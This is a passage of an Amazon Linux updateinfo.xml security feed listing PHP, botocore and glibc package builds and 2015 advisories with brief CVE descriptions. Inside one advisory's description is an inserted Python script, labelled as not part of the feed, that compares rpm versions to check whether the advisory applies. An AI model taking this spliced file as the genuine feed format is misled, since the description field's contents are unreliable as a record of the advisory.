version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package 
name="php55-gd" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.24" release="1.100.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-tidy-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.24" 
release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" 
version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.24-1.100.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-511</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-511: low priority package update for php56</title><issued date="2015-04-17 12:04:00" /><updated date="2015-06-15 14:29:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3329:
A buffer overflow flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1213449:
CVE-2015-3329 php: buffer overflow in phar_set_inode()
CVE-2015-1352:
A NULL pointer dereference flaw was found in PHP's pgsql extension. A specially crafted table name passed to functions such as pg_insert() or pg_select() could cause a PHP application to crash.
1185904:
CVE-2015-1352 php: NULL pointer dereference in pgsql extension
CVE-2015-1351:
A use-after-free flaw was found in PHP's OPcache extension. This flaw could possibly lead to the disclosure of a portion of server memory.
1185900:
CVE-2015-1351 php: use after free in opcache extension
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351" title="" id="CVE-2015-1351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352" title="" id="CVE-2015-1352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329" title="" id="CVE-2015-3329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mbstring" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.8" release="1.111.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-pgsql-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" 
version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.8" release="1.111.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.8" release="1.111.amzn1" 
epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.8" release="1.111.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-dba-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.8-1.111.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-512</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-512: medium priority package update for python-botocore</title><issued date="2015-04-17 15:25:00" /><updated date="2015-04-17 15:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2296:
A flaw was found in the way python-requests set the domain cookie parameter for certain HTTP responses. A remote attacker could use this flaw to modify a cookie to be sent to an arbitrary URL.
1202904:
CVE-2015-2296 python-requests: session fixation and cookie stealing vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2296" title="" id="CVE-2015-2296" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-botocore" version="0.103.0" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-botocore-0.103.0-1.7.amzn1.noarch.rpm</filename></package><package name="python27-botocore" version="0.103.0" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-botocore-0.103.0-1.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-513</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-513: medium priority package update for glibc</title><issued date="2015-04-22 16:12:00" /><updated date="2015-04-23 21:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1781:
A buffer overflow flaw was found in the way glibc's gethostbyname_r() and other related functions computed the size of a buffer when passed a misaligned buffer as input. An attacker able to make an application call any of these functions with a misaligned buffer could use this flaw to crash the application or, potentially, execute arbitrary code with the permissions of the user running the application.
CVE-2013-7423:
It was discovered that, under certain circumstances, glibc's getaddrinfo() function would send DNS queries to random file descriptors. An attacker could potentially use this flaw to send DNS queries to unintended recipients, resulting in information disclosure or data loss due to the application encountering corrupted data.
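Added example (Python, not part of this updateinfo file or of yum): how a consumer of this feed decides whether an advisory such as ALAS-2015-513 still applies to a host, by comparing each installed package's epoch, version and release with the fixed build listed in the advisory's package elements (glibc 2.17-55.142.amzn1 here). yum makes the same decision through librpm; rpmvercmp below is a reimplementation of rpm's ordering, in which numeric and alphabetic runs are compared separately, a numeric run ranks above an alphabetic one, a tilde sorts below everything and a caret sorts above a bare base version. The advisory excerpt is built with the ElementTree API from the package list of this advisory, and the installed set is constructed for the demo: glibc one release behind the fix, glibc-common already at the fixed build, nscd absent.

```python
"""Added example: does an ALAS advisory from updateinfo.xml apply to this host?"""
import re
import xml.etree.ElementTree as ET

# A version string is compared as a sequence of numeric and alphabetic runs;
# separators such as '.', '-' and '_' only delimit runs. '~' and '^' are special.
_TOKEN = re.compile(r"\d+|[A-Za-z]+|~|\^")


def rpmvercmp(a, b):
    """Return -1, 0 or 1 ordering two RPM version or release strings as rpm does."""
    if a == b:
        return 0
    ta, tb = _TOKEN.findall(a), _TOKEN.findall(b)
    i = 0
    while True:
        x = ta[i] if len(ta) > i else ""
        y = tb[i] if len(tb) > i else ""
        if x == "~" or y == "~":        # tilde sorts before everything, even end of string
            if x != "~":
                return 1
            if y != "~":
                return -1
        elif x == "^" or y == "^":      # caret sorts after end of string, before anything else
            if x == "":
                return -1
            if y == "":
                return 1
            if x != "^":
                return 1
            if y != "^":
                return -1
        elif x == "" or y == "":        # one side exhausted: the side with runs left is newer
            return 0 if x == y else (-1 if x == "" else 1)
        else:
            xnum, ynum = x.isdigit(), y.isdigit()
            if xnum != ynum:            # a numeric run is newer than an alphabetic one
                return 1 if xnum else -1
            if xnum:                    # compare numbers by length after dropping leading zeros
                x, y = x.lstrip("0"), y.lstrip("0")
                if len(x) != len(y):
                    return 1 if len(x) > len(y) else -1
            if x != y:                  # same type and length: plain string order decides
                return 1 if x > y else -1
        i += 1


def _epoch(e):
    """rpm -q prints '(none)' for an unset epoch; updateinfo writes '0'."""
    return 0 if e in (None, "", "(none)") else int(e)


def evr_cmp(a, b):
    """Compare two (epoch, version, release) triples: epoch, then version, then release."""
    if _epoch(a[0]) != _epoch(b[0]):
        return 1 if _epoch(a[0]) > _epoch(b[0]) else -1
    return rpmvercmp(a[1], b[1]) or rpmvercmp(a[2], b[2])


def advisory_fixes(updates_root):
    """Map each advisory id to {(name, arch): (epoch, version, release)} of its fixed builds."""
    fixes = {}
    for update in updates_root.iter("update"):
        pkgs = {}
        for p in update.iter("package"):
            pkgs[(p.get("name"), p.get("arch"))] = (p.get("epoch"), p.get("version"), p.get("release"))
        fixes[update.findtext("id")] = pkgs
    return fixes


def affected(fixes, installed):
    """Return (advisory id, name, arch) for every installed package older than an advisory's fix."""
    hits = []
    for adv_id, pkgs in fixes.items():
        for name, arch, epoch, version, release in installed:
            fix = pkgs.get((name, arch))
            if fix is not None and evr_cmp((epoch, version, release), fix) == -1:
                hits.append((adv_id, name, arch))
    return hits


def sample_updateinfo():
    """Three packages of ALAS-2015-513, built with the ElementTree API (constructed for
    the demo rather than read from the repository file)."""
    root = ET.Element("updates")
    upd = ET.SubElement(root, "update", status="final", type="security")
    ET.SubElement(upd, "id").text = "ALAS-2015-513"
    coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux-ami")
    for name in ("glibc", "glibc-common", "nscd"):
        ET.SubElement(coll, "package", name=name, epoch="0", version="2.17",
                      release="55.142.amzn1", arch="x86_64")
    return root


# Constructed installed set as (name, arch, epoch, version, release): glibc lags the fix
# by one release, glibc-common is already fixed, nscd is not installed.
INSTALLED = [
    ("glibc", "x86_64", "(none)", "2.17", "55.141.amzn1"),
    ("glibc-common", "x86_64", "0", "2.17", "55.142.amzn1"),
]

if __name__ == "__main__":
    # For a real host: advisory_fixes(ET.parse("updateinfo.xml").getroot())
    for adv_id, name, arch in affected(advisory_fixes(sample_updateinfo()), INSTALLED):
        print("%s applies: installed %s.%s is older than the fixed build" % (adv_id, name, arch))
```

On a real host, feed advisory_fixes with ET.parse on the cached updateinfo.xml and fill INSTALLED from rpm -qa --qf '%{NAME} %{ARCH} %{EPOCH} %{VERSION} %{RELEASE}\n'; the (none) epoch that rpm prints for packages without one is handled by _epoch. The supported way to get the same answer on the host is yum updateinfo list security followed by yum --security update. This check is read-only: it says whether the advisory applies, not whether the old library is still mapped by a running process.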
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7423" title="" id="CVE-2013-7423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1781" title="" id="CVE-2015-1781" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0863.html" title="" id="RHSA-2015:0863" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nscd" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.142.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/glibc-devel-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.142.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.142.amzn1" epoch="0" 